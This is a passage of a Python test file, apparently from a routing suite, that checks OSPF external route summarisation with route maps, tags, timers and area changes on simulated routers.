"""OSPF summarisation with route map modification of metric type."""
tc_name = request.node.name
write_test_header(tc_name)
tgen = get_topogen()
# Don't run this test if we have any failure.
if tgen.routers_have_failure():
pytest.skip(tgen.errors)
global topo
step("Bring up the base config as per the topology")
reset_config_on_routers(tgen)
protocol = "ospf"
step(
"Configure 5 static routes from the same network on R0"
"5 static routes from different networks and redistribute in R0"
)
input_dict_static_rtes = {
"r0": {
"static_routes": [
{"network": NETWORK["ipv4"], "next_hop": "blackhole"},
{"network": NETWORK2["ipv4"], "next_hop": "blackhole"},
]
}
}
result = create_static_routes(tgen, input_dict_static_rtes)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
dut = "r0"
red_static(dut)
step("Verify that routes are learnt on R1.")
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict_static_rtes)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
result = verify_rib(tgen, "ipv4", dut, input_dict_static_rtes, protocol=protocol)
assert (
result is True
), "Testcase {} : Failed" "Error: Routes is missing in RIB".format(tc_name)
step(
"Configure External Route summary in R0 to summarise 5" " routes to one route."
)
ospf_summ_r1 = {
"r0": {
"ospf": {
"summary-address": [
{"prefix": SUMMARY["ipv4"][0].split("/")[0], "mask": "8"}
]
}
}
}
result = create_router_ospf(tgen, topo, ospf_summ_r1)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step(
"Verify that external routes are summarised to configured summary "
"address on R0 after 5 secs of delay timer expiry and only one "
"route is sent to R1."
)
input_dict_summary = {"r0": {"static_routes": [{"network": SUMMARY["ipv4"][0]}]}}
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict_summary)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
result = verify_rib(tgen, "ipv4", dut, input_dict_summary, protocol=protocol)
assert (
result is True
), "Testcase {} : Failed" "Error: Routes is missing in RIB".format(tc_name)
step("Verify that show ip ospf summary should show the summaries.")
input_dict = {
SUMMARY["ipv4"][0]: {
"Summary address": SUMMARY["ipv4"][0],
"Metric-type": "E2",
"Metric": 20,
"Tag": 0,
"External route count": 5,
}
}
dut = "r0"
result = verify_ospf_summary(tgen, topo, dut, input_dict)
assert (
result is True
), "Testcase {} : Failed" "Error: Summary missing in OSPF DB".format(tc_name)
step("Verify that originally advertised routes are withdraw from there" " peer.")
input_dict = {
"r0": {"static_routes": [{"network": NETWORK["ipv4"], "next_hop": "blackhole"}]}
}
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict, expected=False)
assert (
result is not True
), "Testcase {} : Failed \n Error: " "Routes still present in OSPF RIB {}".format(
tc_name, result
)
result = verify_rib(
tgen, "ipv4", dut, input_dict, protocol=protocol, expected=False
)
assert (
result is not True
), "Testcase {} : Failed" "Error: Routes still present in RIB".format(tc_name)
step(
"Configure route map and & rule to permit configured summary address,"
" redistribute static & connected routes with the route map."
)
step("Configure prefixlist to permit the static routes, add to route map.")
# Create ip prefix list
pfx_list = {
"r0": {
"prefix_lists": {
"ipv4": {
"pf_list_1_ipv4": [
{"seqid": 10, "network": "any", "action": "permit"}
]
}
}
}
}
result = create_prefix_lists(tgen, pfx_list)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
routemaps = {
"r0": {
"route_maps": {
"rmap_ipv4": [
{
"action": "permit",
"match": {"ipv4": {"prefix_lists": "pf_list_1_ipv4"}},
}
]
}
}
}
result = create_route_maps(tgen, routemaps)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
ospf_red_r1 = {
"r0": {
"ospf": {
"redistribute": [{"redist_type": "static", "route_map": "rmap_ipv4"}]
}
}
}
result = create_router_ospf(tgen, topo, ospf_red_r1)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step(
"Verify that external routes are summarised to configured"
"summary address on R0 and only one route is sent to R1. Verify that "
"show ip ospf summary should show the configure summaries."
)
input_dict_summary = {"r0": {"static_routes": [{"network": SUMMARY["ipv4"][0]}]}}
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict_summary)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
result = verify_rib(tgen, "ipv4", dut, input_dict_summary, protocol=protocol)
assert (
result is True
), "Testcase {} : Failed" "Error: Routes is missing in RIB".format(tc_name)
input_dict = {
SUMMARY["ipv4"][0]: {
"Summary address": SUMMARY["ipv4"][0],
"Metric-type": "E2",
"Metric": 20,
"Tag": 0,
"External route count": 5,
}
}
dut = "r0"
result = verify_ospf_summary(tgen, topo, dut, input_dict)
assert (
result is True
), "Testcase {} : Failed" "Error: Summary missing in OSPF DB".format(tc_name)
step("Configure metric type as 1 in route map.")
routemaps = {
"r0": {
"route_maps": {
"rmap_ipv4": [{"action": "permit", "set": {"metric-type": "type-1"}}]
}
}
}
result = create_route_maps(tgen, routemaps)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step(
"Verify that external routes(static / connected) are summarised"
" to configured summary address with metric type 2."
)
input_dict = {
SUMMARY["ipv4"][0]: {
"Summary address": SUMMARY["ipv4"][0],
"Metric-type": "E2",
"Metric": 20,
"Tag": 0,
"External route count": 5,
}
}
dut = "r0"
result = verify_ospf_summary(tgen, topo, dut, input_dict)
assert (
result is True
), "Testcase {} : Failed" "Error: Summary missing in OSPF DB".format(tc_name)
step("Un configure metric type from route map.")
routemaps = {
"r0": {
"route_maps": {
"rmap_ipv4": [
{
"action": "permit",
"set": {"metric-type": "type-1"},
"delete": True,
}
]
}
}
}
result = create_route_maps(tgen, routemaps)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step(
"Verify that external routes(static / connected) are summarised"
" to configured summary address with metric type 2."
)
input_dict = {
SUMMARY["ipv4"][0]: {
"Summary address": SUMMARY["ipv4"][0],
"Metric-type": "E2",
"Metric": 20,
"Tag": 0,
"External route count": 5,
}
}
dut = "r0"
result = verify_ospf_summary(tgen, topo, dut, input_dict)
assert (
result is True
), "Testcase {} : Failed" "Error: Summary missing in OSPF DB".format(tc_name)
step("Change rule from permit to deny in prefix list.")
pfx_list = {
"r0": {
"prefix_lists": {
"ipv4": {
"pf_list_1_ipv4": [
{"seqid": 10, "network": "any", "action": "deny"}
]
}
}
}
}
result = create_prefix_lists(tgen, pfx_list)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
write_test_footer(tc_name)
def test_ospf_type5_summary_tc42_p0(request):
"""OSPF summarisation functionality."""
tc_name = request.node.name
write_test_header(tc_name)
tgen = get_topogen()
# Don't run this test if we have any failure.
if tgen.routers_have_failure():
pytest.skip(tgen.errors)
global topo
step("Bring up the base config as per the topology")
reset_config_on_routers(tgen)
protocol = "ospf"
step(
"Configure 5 static routes from the same network on R0"
"5 static routes from different networks and redistribute in R0"
)
input_dict_static_rtes = {
"r0": {
"static_routes": [
{"network": NETWORK["ipv4"], "next_hop": "blackhole"},
{"network": NETWORK2["ipv4"], "next_hop": "blackhole"},
]
}
}
result = create_static_routes(tgen, input_dict_static_rtes)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
dut = "r0"
red_static(dut)
step("Verify that routes are learnt on R1.")
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict_static_rtes)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
result = verify_rib(tgen, "ipv4", dut, input_dict_static_rtes, protocol=protocol)
assert (
result is True
), "Testcase {} : Failed" "Error: Routes is missing in RIB".format(tc_name)
step(
"Configure External Route summary in R0 to summarise 5"
" routes to one route. with aggregate timer as 6 sec"
)
ospf_summ_r1 = {
"r0": {
"ospf": {
"summary-address": [
{"prefix": SUMMARY["ipv4"][0].split("/")[0], "mask": "8"}
],
"aggr_timer": 6,
}
}
}
result = create_router_ospf(tgen, topo, ospf_summ_r1)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step(
"Verify that external routes are summarised to configured summary "
"address on R0 after 5 secs of delay timer expiry and only one "
"route is sent to R1."
)
input_dict_summary = {"r0": {"static_routes": [{"network": SUMMARY["ipv4"][0]}]}}
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict_summary)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
result = verify_rib(tgen, "ipv4", dut, input_dict_summary, protocol=protocol)
assert (
result is True
), "Testcase {} : Failed" "Error: Routes is missing in RIB".format(tc_name)
step("Verify that show ip ospf summary should show the summaries.")
input_dict = {
SUMMARY["ipv4"][0]: {
"Summary address": SUMMARY["ipv4"][0],
"Metric-type": "E2",
"Metric": 20,
"Tag": 0,
"External route count": 5,
}
}
dut = "r0"
result = verify_ospf_summary(tgen, topo, dut, input_dict)
assert (
result is True
), "Testcase {} : Failed" "Error: Summary missing in OSPF DB".format(tc_name)
step("Verify that originally advertised routes are withdraw from there" " peer.")
input_dict = {
"r0": {"static_routes": [{"network": NETWORK["ipv4"], "next_hop": "blackhole"}]}
}
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict, expected=False)
assert (
result is not True
), "Testcase {} : Failed \n Error: " "Routes still present in OSPF RIB {}".format(
tc_name, result
)
result = verify_rib(
tgen, "ipv4", dut, input_dict, protocol=protocol, expected=False
)
assert (
result is not True
), "Testcase {} : Failed" "Error: Routes still present in RIB".format(tc_name)
step("Delete the configured summary")
ospf_summ_r1 = {
"r0": {
"ospf": {
"summary-address": [
{
"prefix": SUMMARY["ipv4"][0].split("/")[0],
"mask": "8",
"del_aggr_timer": True,
"delete": True,
}
]
}
}
}
result = create_router_ospf(tgen, topo, ospf_summ_r1)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Verify that summary lsa is withdrawn from R1 and deleted from R0.")
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict, expected=False)
assert (
result is not True
), "Testcase {} : Failed \n Error: " "Routes still present in OSPF RIB {}".format(
tc_name, result
)
result = verify_rib(
tgen, "ipv4", dut, input_dict_summary, protocol=protocol, expected=False
)
assert (
result is not True
), "Testcase {} : Failed" "Error: Summary Route still present in RIB".format(
tc_name
)
step("show ip ospf summary should not have any summary address.")
input_dict = {
SUMMARY["ipv4"][0]: {
"Summary address": SUMMARY["ipv4"][0],
"Metric-type": "E2",
"Metric": 20,
"Tag": 0,
"External route count": 5,
}
}
dut = "r0"
result = verify_ospf_summary(tgen, topo, dut, input_dict, expected=False)
assert (
result is not True
), "Testcase {} : Failed" "Error: Summary still present in DB".format(tc_name)
dut = "r1"
step("All 5 routes are advertised after deletion of configured summary.")
result = verify_ospf_rib(tgen, dut, input_dict_static_rtes)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
result = verify_rib(tgen, "ipv4", dut, input_dict_static_rtes, protocol=protocol)
assert (
result is True
), "Testcase {} : Failed" "Error: Routes is missing in RIB".format(tc_name)
step("configure the summary again and delete static routes .")
ospf_summ_r1 = {
"r0": {
"ospf": {
"summary-address": [
{"prefix": SUMMARY["ipv4"][0].split("/")[0], "mask": "8"}
]
}
}
}
result = create_router_ospf(tgen, topo, ospf_summ_r1)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
input_dict = {
SUMMARY["ipv4"][0]: {
"Summary address": SUMMARY["ipv4"][0],
"Metric-type": "E2",
"Metric": 20,
"Tag": 0,
"External route count": 5,
}
}
dut = "r0"
result = verify_ospf_summary(tgen, topo, dut, input_dict)
assert (
result is True
), "Testcase {} : Failed" "Error: Summary missing in OSPF DB".format(tc_name)
input_dict = {
"r0": {
"static_routes": [
{"network": NETWORK["ipv4"], "next_hop": "blackhole", "delete": True}
]
}
}
result = create_static_routes(tgen, input_dict)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
input_dict_summary = {"r0": {"static_routes": [{"network": SUMMARY["ipv4"][0]}]}}
step("Verify that summary route is withdrawn from R1.")
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict_summary, expected=False)
assert (
result is not True
), "Testcase {} : Failed \n Error: " "Routes still present in OSPF RIB {}".format(
tc_name, result
)
result = verify_rib(
tgen, "ipv4", dut, input_dict_summary, protocol=protocol, expected=False
)
assert (
result is not True
), "Testcase {} : Failed" "Error: Routes still present in RIB".format(tc_name)
step("Add back static routes.")
input_dict_static_rtes = {
"r0": {"static_routes": [{"network": NETWORK["ipv4"], "next_hop": "blackhole"}]}
}
result = create_static_routes(tgen, input_dict_static_rtes)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step(
"Verify that external routes are summarised to configured summary"
" address on R0 and only one route is sent to R1."
)
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict_static_rtes, expected=False)
assert (
result is not True
), "Testcase {} : Failed \n Error: " "Routes still present in OSPF RIB {}".format(
tc_name, result
)
result = verify_rib(
tgen, "ipv4", dut, input_dict_static_rtes, protocol=protocol, expected=False
)
assert (
result is not True
), "Testcase {} : Failed" "Error: Routes still present in RIB".format(tc_name)
input_dict_summary = {"r0": {"static_routes": [{"network": SUMMARY["ipv4"][0]}]}}
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict_summary)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
result = verify_rib(tgen, "ipv4", dut, input_dict_summary, protocol=protocol)
assert (
result is True
), "Testcase {} : Failed" "Error: Routes is missing in RIB".format(tc_name)
step("Verify that show ip ospf summary should show configure summaries.")
input_dict = {
SUMMARY["ipv4"][0]: {
"Summary address": SUMMARY["ipv4"][0],
"Metric-type": "E2",
"Metric": 20,
"Tag": 0,
"External route count": 5,
}
}
dut = "r0"
result = verify_ospf_summary(tgen, topo, dut, input_dict)
assert (
result is True
), "Testcase {} : Failed" "Error: Summary missing in OSPF DB".format(tc_name)
step("Configure new static route which is matching configured summary.")
input_dict_static_rtes = {
"r0": {
"static_routes": [{"network": NETWORK_11["ipv4"], "next_hop": "blackhole"}]
}
}
result = create_static_routes(tgen, input_dict_static_rtes)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
# step("verify that summary lsa is not refreshed.")
# show ip ospf database command is not working, waiting for DEV fix.
step("Delete one of the static route.")
input_dict_static_rtes = {
"r0": {
"static_routes": [
{"network": NETWORK_11["ipv4"], "next_hop": "blackhole", "delete": True}
]
}
}
result = create_static_routes(tgen, input_dict_static_rtes)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
# step("verify that summary lsa is not refreshed.")
# show ip ospf database command is not working, waiting for DEV fix.
# step("Verify that deleted static route is removed from ospf LSDB.")
# show ip ospf database command is not working, waiting for DEV fix.
step(
"Configure redistribute connected and configure ospf external"
" summary address to summarise the connected routes."
)
dut = "r0"
red_connected(dut)
clear_ospf(tgen, dut)
ip = topo["routers"]["r0"]["links"]["r3"]["ipv4"]
ip_net = str(ipaddress.ip_interface(u"{}".format(ip)).network)
ospf_summ_r1 = {
"r0": {
"ospf": {"summary-address": [{"prefix": ip_net.split("/")[0], "mask": "8"}]}
}
}
result = create_router_ospf(tgen, topo, ospf_summ_r1)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step(
"Verify that external routes are summarised to configured "
"summary address on R0 and only one route is sent to R1."
)
input_dict_summary = {"r0": {"static_routes": [{"network": "10.0.0.0/8"}]}}
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict_summary)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
result = verify_rib(tgen, "ipv4", dut, input_dict_summary, protocol=protocol)
assert (
result is True
), "Testcase {} : Failed" "Error: Routes is missing in RIB".format(tc_name)
step("Shut one of the interface")
intf = topo["routers"]["r0"]["links"]["r3-link0"]["interface"]
shutdown_bringup_interface(tgen, dut, intf, False)
# step("verify that summary lsa is not refreshed.")
# show ip ospf database command is not working, waiting for DEV fix.
# step("Verify that deleted connected route is removed from ospf LSDB.")
# show ip ospf database command is not working, waiting for DEV fix.
step("Un do shut the interface")
shutdown_bringup_interface(tgen, dut, intf, True)
# step("verify that summary lsa is not refreshed.")
# show ip ospf database command is not working, waiting for DEV fix.
# step("Verify that deleted connected route is removed from ospf LSDB.")
# show ip ospf database command is not working, waiting for DEV fix.
step("Delete OSPF process.")
ospf_del = {"r0": {"ospf": {"delete": True}}}
result = create_router_ospf(tgen, topo, ospf_del)
assert result is True, "Testcase : Failed \n Error: {}".format(result)
step("Reconfigure ospf process with summary")
reset_config_on_routers(tgen)
input_dict_static_rtes = {
"r0": {
"static_routes": [
{"network": NETWORK["ipv4"], "next_hop": "blackhole"},
{"network": NETWORK2["ipv4"], "next_hop": "blackhole"},
]
}
}
result = create_static_routes(tgen, input_dict_static_rtes)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
dut = "r0"
red_static(dut)
red_connected(dut)
ospf_summ_r1 = {
"r0": {
"ospf": {
"summary-address": [
{"prefix": SUMMARY["ipv4"][0].split("/")[0], "mask": "8"}
]
}
}
}
result = create_router_ospf(tgen, topo, ospf_summ_r1)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step(
"Verify that external routes are summarised to configured summary "
"address on R0 and only one route is sent to R1."
)
input_dict = {
SUMMARY["ipv4"][0]: {
"Summary address": SUMMARY["ipv4"][0],
"Metric-type": "E2",
"Metric": 20,
"Tag": 0,
"External route count": 5,
}
}
dut = "r0"
result = verify_ospf_summary(tgen, topo, dut, input_dict)
assert (
result is True
), "Testcase {} : Failed" "Error: Summary missing in OSPF DB".format(tc_name)
input_dict_summary = {"r0": {"static_routes": [{"network": SUMMARY["ipv4"][0]}]}}
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict_summary)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
result = verify_rib(tgen, "ipv4", dut, input_dict_summary, protocol=protocol)
assert (
result is True
), "Testcase {} : Failed" "Error: Routes is missing in RIB".format(tc_name)
ospf_summ_r1 = {
"r0": {
"ospf": {
"summary-address": [
{"prefix": SUMMARY["ipv4"][0].split("/")[0], "mask": "8"}
]
}
}
}
result = create_router_ospf(tgen, topo, ospf_summ_r1)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
# step("verify that summary lsa is not refreshed.")
# show ip ospf database command is not working, waiting for DEV fix.
step("Delete the redistribute command in ospf.")
dut = "r0"
red_connected(dut, config=False)
red_static(dut, config=False)
step("Verify that summary route is withdrawn from the peer.")
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict_summary, expected=False)
assert (
result is not True
), "Testcase {} : Failed \n Error: " "Routes still present in OSPF RIB {}".format(
tc_name, result
)
result = verify_rib(
tgen, "ipv4", dut, input_dict_summary, protocol=protocol, expected=False
)
assert (
result is not True
), "Testcase {} : Failed" "Error: Routes still present in RIB".format(tc_name)
ospf_summ_r1 = {
"r0": {
"ospf": {
"summary-address": [
{
"prefix": SUMMARY["ipv4"][0].split("/")[0],
"mask": "8",
"metric": "1234",
}
]
}
}
}
result = create_router_ospf(tgen, topo, ospf_summ_r1)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
write_test_footer(tc_name)
def test_ospf_type5_summary_tc45_p0(request):
"""OSPF summarisation with Tag option"""
tc_name = request.node.name
write_test_header(tc_name)
tgen = get_topogen()
# Don't run this test if we have any failure.
if tgen.routers_have_failure():
pytest.skip(tgen.errors)
global topo
step("Bring up the base config as per the topology")
step("Configure OSPF on all the routers of the topology.")
reset_config_on_routers(tgen)
protocol = "ospf"
step(
"Configure 5 static routes from the same network on R0"
"5 static routes from different networks and redistribute in R0"
)
input_dict_static_rtes = {
"r0": {
"static_routes": [
{"network": NETWORK["ipv4"], "next_hop": "blackhole"},
{"network": NETWORK2["ipv4"], "next_hop": "blackhole"},
]
}
}
result = create_static_routes(tgen, input_dict_static_rtes)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
dut = "r0"
red_static(dut)
step("Verify that routes are learnt on R1.")
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict_static_rtes)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
result = verify_rib(tgen, "ipv4", dut, input_dict_static_rtes, protocol=protocol)
assert (
result is True
), "Testcase {} : Failed" "Error: Routes is missing in RIB".format(tc_name)
step(
"Configure External Route summary in R0 to summarise 5" " routes to one route."
)
ospf_summ_r1 = {
"r0": {
"ospf": {
"summary-address": [
{
"prefix": SUMMARY["ipv4"][0].split("/")[0],
"mask": "8",
"tag": "1234",
}
]
}
}
}
result = create_router_ospf(tgen, topo, ospf_summ_r1)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step(
"Verify that external routes are summarised to configured summary"
" address on R0 and only one route is sent to R1 with configured tag."
)
input_dict_summary = {
"r0": {"static_routes": [{"network": SUMMARY["ipv4"][0], "tag": "1234"}]}
}
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict_summary)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
result = verify_rib(tgen, "ipv4", dut, input_dict_summary, protocol=protocol)
assert (
result is True
), "Testcase {} : Failed" "Error: Routes is missing in RIB".format(tc_name)
step("Verify that show ip ospf summary should show the summaries with tag.")
input_dict = {
SUMMARY["ipv4"][0]: {
"Summary address": SUMMARY["ipv4"][0],
"Metric-type": "E2",
"Metric": 20,
"Tag": 1234,
"External route count": 5,
}
}
dut = "r0"
result = verify_ospf_summary(tgen, topo, dut, input_dict)
assert (
result is True
), "Testcase {} : Failed" "Error: Summary missing in OSPF DB".format(tc_name)
step("Delete the configured summary")
ospf_summ_r1 = {
"r0": {
"ospf": {
"summary-address": [
{
"prefix": SUMMARY["ipv4"][0].split("/")[0],
"mask": "8",
"tag": "1234",
"delete": True,
}
]
}
}
}
result = create_router_ospf(tgen, topo, ospf_summ_r1)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Verify that summary lsa is withdrawn from R1 and deleted from R0.")
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict_summary, expected=False)
assert (
result is not True
), "Testcase {} : Failed \n Error: " "Routes still present in OSPF RIB {}".format(
tc_name, result
)
result = verify_rib(
tgen, "ipv4", dut, input_dict_summary, protocol=protocol, expected=False
)
assert (
result is not True
), "Testcase {} : Failed" "Error: Summary Route still present in RIB".format(
tc_name
)
step("show ip ospf summary should not have any summary address.")
input_dict = {
SUMMARY["ipv4"][0]: {
"Summary address": SUMMARY["ipv4"][0],
"Metric-type": "E2",
"Metric": 20,
"Tag": 1234,
"External route count": 5,
}
}
dut = "r0"
result = verify_ospf_summary(tgen, topo, dut, input_dict, expected=False)
assert (
result is not True
), "Testcase {} : Failed" "Error: Summary still present in DB".format(tc_name)
step("Configure Min tag value")
ospf_summ_r1 = {
"r0": {
"ospf": {
"summary-address": [
{"prefix": SUMMARY["ipv4"][0].split("/")[0], "mask": "8", "tag": 1}
]
}
}
}
result = create_router_ospf(tgen, topo, ospf_summ_r1)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
input_dict_summary = {
"r0": {"static_routes": [{"network": SUMMARY["ipv4"][0], "tag": "1"}]}
}
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict_summary)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
result = verify_rib(tgen, "ipv4", dut, input_dict_summary, protocol=protocol)
assert (
result is True
), "Testcase {} : Failed" "Error: Routes is missing in RIB".format(tc_name)
step("Verify that show ip ospf summary should show the summaries with tag.")
input_dict = {
SUMMARY["ipv4"][0]: {
"Summary address": SUMMARY["ipv4"][0],
"Metric-type": "E2",
"Metric": 20,
"Tag": 1,
"External route count": 5,
}
}
dut = "r0"
result = verify_ospf_summary(tgen, topo, dut, input_dict)
assert (
result is True
), "Testcase {} : Failed" "Error: Summary missing in OSPF DB".format(tc_name)
step("Configure Max Tag Value")
ospf_summ_r1 = {
"r0": {
"ospf": {
"summary-address": [
{
"prefix": SUMMARY["ipv4"][0].split("/")[0],
"mask": "8",
"tag": 4294967295,
}
]
}
}
}
result = create_router_ospf(tgen, topo, ospf_summ_r1)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
input_dict_summary = {
"r0": {"static_routes": [{"network": SUMMARY["ipv4"][0], "tag": "4294967295"}]}
}
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict_summary)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
result = verify_rib(tgen, "ipv4", dut, input_dict_summary, protocol=protocol)
assert (
result is True
), "Testcase {} : Failed" "Error: Routes is missing in RIB".format(tc_name)
step(
"Verify that boundary values tags are used for summary route"
" using show ip ospf route command."
)
input_dict = {
SUMMARY["ipv4"][0]: {
"Summary address": SUMMARY["ipv4"][0],
"Metric-type": "E2",
"Metric": 20,
"Tag": 4294967295,
"External route count": 5,
}
}
dut = "r0"
result = verify_ospf_summary(tgen, topo, dut, input_dict)
assert (
result is True
), "Testcase {} : Failed" "Error: Summary missing in OSPF DB".format(tc_name)
step("configure new static route with different tag.")
input_dict_static_rtes_11 = {
"r0": {
"static_routes": [
{"network": NETWORK_11["ipv4"], "next_hop": "blackhole", "tag": "88888"}
]
}
}
result = create_static_routes(tgen, input_dict_static_rtes_11)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("New tag has not been used by summary address.")
input_dict_summary = {
"r0": {"static_routes": [{"network": SUMMARY["ipv4"][0], "tag": "88888"}]}
}
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict_summary, tag="88888", expected=False)
assert (
result is not True
), "Testcase {} : Failed \n Error: " "Routes still present in OSPF RIB {}".format(
tc_name, result
)
result = verify_rib(
tgen,
"ipv4",
dut,
input_dict_summary,
protocol=protocol,
tag="88888",
expected=False,
)
assert (
result is not True
), "Testcase {} : Failed" "Error: Routes still present in RIB".format(tc_name)
step(
"Verify that boundary values tags are used for summary route"
" using show ip ospf route command."
)
input_dict = {
SUMMARY["ipv4"][0]: {
"Summary address": SUMMARY["ipv4"][0],
"Metric-type": "E2",
"Metric": 20,
"Tag": 88888,
"External route count": 5,
}
}
dut = "r0"
result = verify_ospf_summary(tgen, topo, dut, input_dict, expected=False)
assert (
result is not True
), "Testcase {} : Failed" "Error: Summary missing in OSPF DB".format(tc_name)
step("Delete the configured summary address")
ospf_summ_r1 = {
"r0": {
"ospf": {
"summary-address": [
{
"prefix": SUMMARY["ipv4"][0].split("/")[0],
"mask": "8",
"tag": 4294967295,
"delete": True,
}
]
}
}
}
result = create_router_ospf(tgen, topo, ospf_summ_r1)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step(
"Verify that 6 routes are advertised to neighbour with 5 routes"
" without any tag, 1 route with tag."
)
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict_static_rtes)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
result = verify_rib(tgen, "ipv4", dut, input_dict_static_rtes, protocol=protocol)
assert (
result is True
), "Testcase {} : Failed" "Error: Routes is missing in RIB".format(tc_name)
step("Verify that summary address is flushed from neighbor.")
dut = "r1"
result = verify_ospf_rib(tgen, dut, input_dict_summary, expected=False)
assert (
result is not True
), "Testcase {} : Failed \n Error: " "Routes still present in OSPF RIB {}".format(
tc_name, result
)
result = verify_rib(
tgen, "ipv4", dut, input_dict_summary, protocol=protocol, expected=False
)
assert (
result is not True
), "Testcase {} : Failed" "Error: Routes still present in RIB".format(tc_name)
step("Configure summary first & then configure matching static route.")
input_dict_static_rtes = {
"r0": {
"static_routes": [
{"network": NETWORK["ipv4"], "next_hop": "blackhole", "delete": True},
{"network": NETWORK2["ipv4"], "next_hop": "blackhole", "delete": True},
]
}
}
result = create_static_routes(tgen, input_dict_static_rtes)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
ospf_summ_r1 = {
"r0": {
"ospf": {
"summary-address": [
{"prefix": SUMMARY["ipv4"][0].split("/")[0], "mask": "8"}
]
}
}
}
result = create_router_ospf(tgen, topo, ospf_summ_r1)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
input_dict_static_rtes = {
"r0": {
"static_routes": [
{"network": NETWORK["ipv4"], "next_hop": "blackhole"},
{"network": NETWORK2["ipv4"], "next_hop": "blackhole"},
]
}
}
result = create_static_routes(tgen, input_dict_static_rtes)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
step("Repeat steps 1 to 10 of summarisation in non Back bone area.")
reset_config_on_routers(tgen)
step("Change the area id on the interface on R0")
input_dict = {
"r0": {
"links": {
"r1": {
"interface": topo["routers"]["r0"]["links"]["r1"]["interface"],
"ospf": {"area": "0.0.0.0"},
"delete": True,
}
}
}
}
result = create_interfaces_cfg(tgen, input_dict)
assert result is True, "Testcase {} :Failed \n Error: {}".format(tc_name, result)
input_dict = {
"r0": {
"links": {
"r1": {
"interface": topo["routers"]["r0"]["links"]["r1"]["interface"],
"ospf": {"area": "0.0.0.1"},
}
}
}
}
result = create_interfaces_cfg(tgen, input_dict)
assert result is True, "Testcase {} :Failed \n Error: {}".format(tc_name, result)
step("Change the area id on the interface ")
input_dict = {
"r1": {
"links": {
"r0": {
"interface": topo["routers"]["r1"]["links"]["r0"]["interface"],
"ospf": {"area": "0.0.0.0"},
"delete": True,
}
}
}
}
result = create_interfaces_cfg(tgen, input_dict)
assert result is True, "Testcase {} :Failed \n Error: {}".format(tc_name, result)
input_dict = {
"r1": {
"links": {
"r0": {
"interface": topo["routers"]["r1"]["links"]["r0"]["interface"],
"ospf": {"area": "0.0.0.1"},
}
}
}
}
result = create_interfaces_cfg(tgen, input_dict)
assert result is True, "Testcase {} :Failed \n Error: {}".format(tc_name, result)
ospf_covergence = verify_ospf_neighbor(tgen, topo)
assert ospf_covergence is True, "setup_module :Failed \n Error:" " {}".format(
